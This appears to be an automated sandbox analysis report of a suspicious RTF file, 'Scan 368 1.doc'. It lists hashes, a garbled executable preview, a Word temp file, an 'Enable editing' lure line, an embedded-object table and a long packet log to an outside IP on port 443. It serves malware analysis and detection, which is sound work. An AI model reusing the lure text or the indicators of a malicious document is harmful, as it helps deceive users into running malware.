                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....D f.................@..."......._... ........@.. ....................................@..................................^..W....`... ...........d...6........................................................... ............... ..H............text....?... ...@.................. ..`.rsrc.... ...`... ...B..............@..@.reloc...............b..............@..B.................^......H.......,....O......C....................................................0..A....... F........%.....(......... .........%./...(.....0...(....*.....&*...f.(.....s....}......}....*...0..........~0.....~.......o....~....%-.&~..........s....%.....(...+o.....+......E........d...3...d...j...............+.8.....o.....s......o.....o....&.. ..... ....Y..+...o........(....o......o...... ..... 01..Y..8u...s.......o.....o......+.+......E............9...h.......Z...................+...+..

                                                        C:\Users\user\Desktop\~$an 368 1.doc

                                                        Download File
                                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):162
                                                        Entropy (8bit):2.4797606462020307
                                                        Encrypted:false
                                                        SSDEEP:3:vrJlaCkWtVyHlqlzl0pbklMWjV4lc+/dllln:vdsCkWtWYlz21kF2JV/l
                                                        MD5:2CF7D3B8DED3F1D5CE1AC92F3E51D4ED
                                                        SHA1:95E13378EA9CACA068B2687F01E9EF13F56627C2
                                                        SHA-256:60DF94CDE4FD9B4A73BB13775079D75CE954B75DED5A2878277FA64AD767CAB1
                                                        SHA-512:2D5797FBBE44766D93A5DE3D92911358C70D8BE60D5DF542ECEDB77D1195DC1EEF85E4CA1445595BE81550335A20AB3F11B512385FE20F75B1E269D6AB048E0A
                                                        Malicious:false
                                                        Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

                                                        Static File Info

                                                        General

                                                        File type:Rich Text Format data, version 1
                                                        Entropy (8bit):3.839982897943465
                                                        TrID:
                                                        • Rich Text Format (5005/1) 55.56%
                                                        • Rich Text Format (4004/1) 44.44%
                                                        File name:Scan 368 1.doc
                                                        File size:327'186 bytes
                                                        MD5:f22c33e0af52d382e821ff26fe23f30b
                                                        SHA1:15bdcdd580cbb66c67d8fd90151e25fc285f7de3
                                                        SHA256:50297c7705e690b43057219bc9a89cfb49e6d739742bbf4d904b64832b1cfefc
                                                        SHA512:18c1c6736ee9a5e5083cd8841a1fa1eb97a51947b63e919eb6516c4302778007f08efd149d2209bea6c35e8713003617a417e9725446ef18a707786a6677fafd
                                                        SSDEEP:3072:GQsXvKMEesXvKMEesXvKMEesXvKMEesXvKMEt955Rj5/BBRnLqOT:GhKMeKMeKMeKMeKM2j5/BBxLqOT
                                                        TLSH:2864142EE34E0269CB520377AA1B1E94A6FDBB3EB39051A1341C433533DD87D52266BD
                                                        File Content Preview:{\rtf1..{\*\wHjhgEYPJO9YHUDcXf1OwSqXtlqDBAx3EaJOL4ZgUrqE4jc6AY2Nr9UasMEPWOXbmJuGi}..{\483268256Document created in earlier version microsoft office word.To view or edit this document, please click ("Enable editing") from the yellow bar aboveASSIGNMENTMCS

                                                        File Icon

                                                        Icon Hash:2764a3aaaeb7bdbf

                                                        Static RTF Info

                                                        Objects

                                                        IdStartFormat IDFormatClassnameDatasizeFilenameSourcepathTemppathExploit
                                                        00001AFDBhno

                                                        Network Behavior

                                                        Network Port Distribution

                                                        TCP Packets

                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Apr 18, 2024 10:37:25.643904924 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:25.643934965 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:25.644001961 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:25.653523922 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:25.653537989 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:25.875663042 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:25.875916958 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:25.881525993 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:25.881539106 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:25.881877899 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:25.881933928 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:25.948772907 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:25.996129036 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.401974916 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.402031898 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.402065039 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.402097940 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.402097940 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:26.402129889 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.402162075 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:26.402266979 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.402296066 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.402298927 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:26.402298927 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:26.402313948 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.402427912 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:26.402640104 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.402689934 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:26.402699947 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.402729988 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.402749062 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:26.402756929 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.402780056 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:26.402803898 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:26.407316923 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:26.542727947 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.542788029 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:26.542792082 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.542804956 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.542831898 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:26.542845964 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:26.543056011 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.543095112 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:26.543103933 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.543143034 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:26.543148994 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.543195963 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:26.543602943 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.543653965 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:26.543659925 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.543699980 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:26.543706894 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.543741941 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.543746948 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:26.543754101 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.543785095 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:26.544373989 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.544430971 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:26.544435978 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.544477940 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:26.544485092 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.544517040 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.544518948 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:26.544528961 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.544560909 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:26.544568062 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.544605970 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:26.545370102 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.545420885 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.545423031 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:26.545433998 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.545459032 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:26.545476913 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:26.682527065 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.682651043 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:26.682670116 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.682715893 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.682718992 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:26.682729006 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.682760000 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:26.682775974 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:26.684278965 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.684354067 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:26.684362888 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.684405088 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:26.684412003 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.684448004 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:26.684453964 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.684489965 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:26.684497118 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.684530973 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:26.684537888 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.684556961 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.684571981 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:26.684580088 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.684592962 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:26.684613943 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:26.684621096 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.684648991 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.684657097 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:26.684664011 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.684689999 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:26.684711933 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:26.684804916 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:26.685398102 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.685453892 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.685461044 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:26.685471058 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.685503960 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.685503960 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:26.685527086 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:26.685534000 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.685563087 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:26.685580015 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:26.686260939 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.686326027 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:26.686333895 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.686383963 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:26.687237978 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.687303066 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:26.687313080 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.687330961 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.687355042 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:26.687361002 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.687375069 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:26.687402010 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:26.688044071 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.688087940 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.688110113 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:26.688118935 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.688141108 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:26.688158989 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:26.823573112 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.823710918 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:26.823767900 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.823836088 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:26.824228048 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.824296951 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:26.825308084 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.825385094 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:26.825475931 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.825532913 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:26.825947046 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.826011896 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:26.826088905 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.826145887 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:26.826811075 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.826875925 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:26.826951981 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.827007055 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:26.827704906 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.827774048 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:26.827852964 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.827903032 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:26.828608036 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.828676939 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:26.828751087 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.828814983 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:26.829498053 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.829575062 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:26.830292940 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.830363035 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:26.830410004 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.830476046 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:26.967942953 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.968138933 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:26.968156099 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.968214989 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:26.968226910 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.968291044 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:26.968687057 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.968743086 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:26.968859911 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.968921900 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:26.969374895 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.969429970 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:26.970303059 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.970364094 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:26.970370054 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.970386028 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.970422029 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:26.971189022 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.971245050 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:26.971252918 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.971291065 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.971292019 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:26.971304893 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.971333981 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:26.973006964 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.973016977 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.973073006 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:26.973082066 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.973123074 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:26.973850965 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.973910093 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.973911047 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:26.973926067 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.973947048 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:26.973961115 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:26.974728107 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.974766016 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.974786997 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:26.974795103 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.974807978 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:26.974833012 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:26.975651026 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.975703955 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:26.975719929 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.975763083 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:26.976543903 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.976600885 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.976603985 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:26.976613998 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.976639986 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:26.976656914 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:26.977416039 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.977468967 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:26.978243113 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.978311062 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.978312016 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:26.978324890 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.978352070 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:26.978367090 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:26.979058027 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.979110956 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:26.979182005 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.979228020 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:26.980441093 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.980501890 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:26.980515957 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.980557919 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:26.981329918 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.981384039 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:26.981417894 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.981463909 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:26.983201981 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.983251095 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.983259916 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:26.983268976 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:26.983304024 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:26.983325958 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:27.113941908 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:27.114020109 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:27.114057064 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:27.114074945 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:27.114128113 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:27.114128113 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:27.114273071 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:27.114320993 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:27.114778042 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:27.114840031 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:27.117082119 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:27.117152929 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:27.117152929 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:27.117172956 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:27.117207050 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:27.117239952 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:27.118839025 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:27.118905067 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:27.118911028 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:27.118927002 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:27.118972063 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:27.120630980 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:27.120698929 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:27.120703936 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:27.120718956 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:27.120759964 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:27.122482061 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:27.122545958 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:27.122553110 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:27.122566938 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:27.122608900 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:27.124233961 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:27.124301910 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:27.124305964 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:27.124320984 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:27.124372959 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:27.124382019 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:27.125555992 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:27.125603914 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:27.125624895 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:27.125633955 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:27.125647068 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:27.125670910 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:27.127326012 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:27.127392054 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:27.127405882 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:27.127413988 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:27.127444029 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:27.127461910 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:27.127461910 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:27.129127026 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:27.129194021 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:27.129218102 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:27.129225016 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:27.129264116 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:27.129951000 CEST44349163172.67.175.222192.168.2.22
